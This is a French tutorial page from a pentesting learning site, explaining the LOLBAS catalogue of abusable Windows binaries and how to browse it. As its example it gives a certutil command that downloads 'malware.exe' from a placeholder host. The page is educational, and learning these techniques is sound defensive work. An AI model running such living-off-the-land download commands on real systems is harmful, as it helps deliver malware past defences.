Road To Hacker
  • ACCUEIL
  • OUTILS
    • OUTILS LOCAUX
      • Acunetix
      • Aircrack-ng
      • Apktool
      • Braa
      • Burp Suite
      • Cewl
      • Crunch
      • Cupp
      • cURL
      • Dig
      • Dirb
      • Empire
      • Enum4linux
      • Evil-WinRM
      • Feroxbuster
      • Gobuster
      • Hashcat
      • Hydra
      • John The Ripper
      • Metasploit & Msfvenom
      • Mimikatz
      • Netcat
      • NetExec
        • Modules
      • Nikto
      • Nmap
      • Nuclei
      • Onesixtyone
      • OpenVAS
      • Penelope
      • Pwncat
      • Recon-ng
      • Responder
      • Semgrep
      • Smbmap
      • Snmpwalk
      • Sqlmap
      • Sublist3r
      • Tcpdump
      • The Harvester
      • Wfuzz
      • Wapiti
      • Zap
    • OUTILS EN LIGNE
      • Hacktools
      • Hash Cracking
      • Encodage et Conversion
      • Stéganographie
      • Shells et Reverse Shells
      • GTFOBins
      • LOLBAS
  • SERVICES ET PROTOCOLES
    • DATABASE
      • MongoDB
      • MSSQL
      • MySQL
      • Oracle TNS
      • SQLite3
    • FTP
    • IMAP/POP3
    • IPMI
    • NFS
    • RSYNC
    • SNMP
    • SMTP
    • SMB
      • Rpcclient
      • Smbclient
    • SSH
  • ENUMERATION SYSTEMES
    • Enumération Linux
    • Enumération Windows
  • TIPS
    • Commandes de base Linux
    • Commandes de base Windows
    • Shell Stable et Reverse Shell
    • xfreerdp / rdesktop
  • INFORMATIONS LEGALES
    • Mentions légales
    • Politique de confidentialité
Propulsé par GitBook
Sur cette page
  • Tuto LOLBAS
  • Introduction
  • Accéder à LOLBAS
  • Fonctionnalités principales :
  • Comment utiliser LOLBAS
  • Bonnes Pratiques pour les Deux Ressources :
  1. OUTILS
  2. OUTILS EN LIGNE

LOLBAS

Tuto LOLBAS

⚠️ Avertissement : Ce contenu est strictement destiné à un usage éducatif et éthique dans le domaine de la cybersécurité. Toute utilisation illégale ou malveillante est interdite et engage la seule responsabilité de l’utilisateur.

Introduction

LOLBAS (Living Off The Land Binaries and Scripts) est un référentiel en ligne qui recense les binaires, scripts, et bibliothèques Windows pouvant être détournés à des fins malveillantes ou pour des tests de sécurité.

Accéder à LOLBAS

  • URL : LOLBAS

Fonctionnalités principales :

  • Catalogue des binaires Windows abusables : Une collection exhaustive de binaires et scripts légitimes intégrés à Windows qui peuvent être détournés.

  • Filtres par type : Explorer les binaires, scripts, ou bibliothèques par catégories spécifiques.

  • Exemples détaillés : Chaque binaire est accompagné de techniques exploitables pour des activités comme l'escalade de privilèges, l'exfiltration, ou la persistance.

Comment utiliser LOLBAS

  1. Rechercher un binaire/script :

    • Accédez à LOLBAS.

    • Utilisez la barre de recherche ou parcourez les catégories pour trouver un binaire spécifique (ex. : certutil).

  2. Explorer les capacités :

    • Cliquez sur le binaire pour voir les scénarios exploitables :

      • Execution : Utilisation du binaire pour exécuter des commandes arbitraires.

      • Download : Exploitation pour télécharger des fichiers à partir de l'Internet.

      • Persistence : Techniques pour maintenir l'accès au système.

  3. Exemple avec certutil :

    • Utilisation de certutil pour télécharger un fichier :

      certutil.exe -urlcache -split -f http://example.com/malware.exe malware.exe

  4. Tester dans un environnement sécurisé :

    • Ces techniques doivent être expérimentées dans un environnement contrôlé pour éviter tout impact négatif.

Bonnes Pratiques pour les Deux Ressources :

  • Utilisation Éthique : Ces outils sont conçus pour l'apprentissage et les tests de sécurité éthiques uniquement.

  • Test en Environnement Sécurisé : Utilisez des machines virtuelles ou des environnements isolés pour tester les scénarios.

  • Mises à Jour Régulières : Consultez fréquemment ces référentiels, car de nouveaux outils et méthodes y sont régulièrement ajoutés.

Liens utiles :

  • Mentions légales

  • Politique de confidentialité

  • Contactez-nous

PrécédentGTFOBinsSuivantSERVICES ET PROTOCOLES

Dernière mise à jour il y a 3 mois